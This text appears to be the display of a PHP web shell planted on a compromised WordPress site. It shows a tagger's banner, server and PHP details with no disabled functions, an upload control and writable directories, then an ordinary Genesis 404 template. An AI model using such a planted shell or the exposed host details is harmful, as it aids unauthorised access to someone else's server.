Heray-Was-Here
Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.1.31
Disable Function : NONE
Directory :  /opt/matlock/wp-content/themes/lmg_custom/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /opt/matlock/wp-content/themes/lmg_custom/404.php
<?php
/**
 * Genesis Framework.
 *
 * WARNING: This file is part of the core Genesis Framework. DO NOT edit this file under any circumstances.
 * Please do all modifications in the form of a child theme.
 *
 */

//* Remove default loop
remove_action( 'genesis_loop', 'genesis_do_loop' );

add_action( 'genesis_loop', 'genesis_404' );
/**
 * This function outputs a 404 "Not Found" error message
 *
 * @since 1.6
 */
function genesis_404() {
	echo genesis_html5() ? '<div class="inner-content">' : '';

		printf( '<div class="notfound-container"><h1 class="entry-title">%s</h1>', apply_filters( 'genesis_404_entry_title', __( 'Not found, error 404', 'genesis' ) ) );
		echo '<div class="entry-content">';

			if ( genesis_html5() ) :

				echo apply_filters( 'genesis_404_entry_content', '<p>' . sprintf( __( 'The page you are looking for no longer exists, or never has. Perhaps you can return back to the site\'s <a href="%s">homepage</a> and see if you can find what you are looking for.  If you think you have found this page in error please contact the webmaster for assistance.', 'genesis' ), trailingslashit( home_url() ) ) . '</p>' );


			else :
	?>

			<p><?php printf( __( 'The page you are looking for no longer exists. Perhaps you can return back to the site\'s <a href="%s">homepage</a> and see if you can find what you are looking for.', 'genesis' ), trailingslashit( home_url() ) ); ?></p>



	<?php
			endif;

		echo genesis_html5() ? '</div>' : '</div></div>';

}

genesis();

Hry